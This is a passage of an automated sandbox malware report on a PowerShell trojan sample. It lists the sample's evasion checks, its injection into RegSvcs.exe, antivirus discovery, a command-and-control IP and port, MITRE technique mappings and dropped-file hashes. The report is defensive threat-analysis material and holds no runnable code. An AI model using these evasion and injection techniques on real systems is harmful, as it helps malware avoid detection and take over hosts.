            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5213Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4629Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6909Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2940Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1480Thread sleep time: -19369081277395017s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: Amcache.hve.0.drBinary or memory string: VMware
            Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000FCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.0.drBinary or memory string: vmci.sys
            Source: Amcache.hve.0.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.0.drBinary or memory string: VMware20,1
            Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DD6008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3716, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6568, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3716, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6568, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            211
            Process Injection
            1
            Masquerading
            OS Credential Dumping241
            Security Software Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop Protocol1
            Clipboard Data
            1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
            Virtualization/Sandbox Evasion
            Security Account Manager241
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information
            Cached Domain Credentials23
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1599699 Sample: b.ps1 Startdate: 26/01/2025 Architecture: WINDOWS Score: 100 22 Suricata IDS alerts for network traffic 2->22 24 Found malware configuration 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 7 other signatures 2->28 7 powershell.exe 20 26 2->7         started        process3 signatures4 30 Query firmware table information (likely to detect VMs) 7->30 32 Writes to foreign memory regions 7->32 34 Injects a PE file into a foreign processes 7->34 10 RegSvcs.exe 2 7->10         started        14 wermgr.exe 14 7->14         started        16 conhost.exe 7->16         started        process5 dnsIp6 20 176.113.115.228, 4412, 49709 SELECTELRU Russian Federation 10->20 36 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->36 18 WerFault.exe 24 16 10->18         started        signatures7 process8

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            b.ps113%VirustotalBrowse
            b.ps18%ReversingLabsWin32.Trojan.Generic
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            176.113.115.2280%Avira URL Cloudsafe

            Download Network PCAP: filteredfull

            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            176.113.115.228true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2397399939.000001DD9F3EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000000.00000002.2378338667.000001DD8F939000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2397399939.000001DD9F3EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://upx.sf.netAmcache.hve.0.drfalse
                              high
                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.2378338667.000001DD8F151000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2378338667.000001DD8F151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    176.113.115.228
                                    unknownRussian Federation
                                    49505SELECTELRUtrue
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1599699
                                    Start date and time:2025-01-26 10:33:11 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 15s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:13
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:b.ps1
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winPS1@7/14@0/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 9
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29, 52.168.117.173, 40.126.32.74, 13.107.246.45, 20.109.210.53, 20.190.159.4
                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target RegSvcs.exe, PID 6568 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 3716 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    TimeTypeDescription
                                    04:34:11API Interceptor41x Sleep call for process: powershell.exe modified
                                    04:34:15API Interceptor8536502x Sleep call for process: RegSvcs.exe modified
                                    04:34:35API Interceptor1x Sleep call for process: wermgr.exe modified
                                    04:37:46API Interceptor1x Sleep call for process: WerFault.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    176.113.115.228Wn0FGQ53RW.ps1Get hashmaliciousXWormBrowse
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      SELECTELRUWn0FGQ53RW.ps1Get hashmaliciousXWormBrowse
                                      • 176.113.115.228
                                      steel.exeGet hashmaliciousSocks5SystemzBrowse
                                      • 176.113.115.96
                                      steel.exeGet hashmaliciousSocks5SystemzBrowse
                                      • 176.113.115.96
                                      3MJRZ0IzVh.exeGet hashmaliciousLummaC StealerBrowse
                                      • 176.113.115.37
                                      http://uea.uz/water/index.htmGet hashmaliciousUnknownBrowse
                                      • 92.53.68.16
                                      https://goo.su/eR7m9BbGet hashmaliciousUnknownBrowse
                                      • 31.184.215.132
                                      random.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                      • 176.113.115.163
                                      armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      • 94.154.35.238
                                      armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      • 94.154.35.238
                                      i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      • 94.154.35.238
                                      No context
                                      No context
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.1749288364721844
                                      Encrypted:false
                                      SSDEEP:192:CrHEOLEk8Qcsy/0BU/Sa6THy8WkmzuiFNZ24IO8aX:+RL+Q/ZBU/SaWS/9zuiFNY4IO8a
                                      MD5:E45700890495370F74E7C5C54F9A3014
                                      SHA1:20DA3A802629B4A72AAADB7FE97AF3CF1E422841
                                      SHA-256:EEFF8FFD4BBB5171B813499D51DCF2A76C284124A71C7F60E11C31802C5EFB10
                                      SHA-512:FC61D41F00555434E38CEA2243B1552F292A29409B37C57104E650B67EBA4C5D216DFA9CF1FDA94708F9A67929AE1612B4CB9E930B05C241468B77E49F9582BD
                                      Malicious:false
                                      Reputation:low
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.3.5.7.8.6.4.0.6.5.2.7.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.3.5.7.8.6.4.6.2.7.7.7.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.d.6.8.a.b.9.-.4.3.7.d.-.4.0.1.b.-.b.b.d.0.-.4.4.b.9.4.3.2.4.c.1.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.0.c.d.d.9.3.-.6.d.f.c.-.4.9.1.5.-.9.4.a.6.-.c.9.5.4.4.0.0.6.4.9.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.a.8.-.0.0.0.1.-.0.0.1.4.-.6.2.e.0.-.1.4.7.5.d.5.6.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.
                                      Process:C:\Windows\System32\wermgr.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.5318512986567241
                                      Encrypted:false
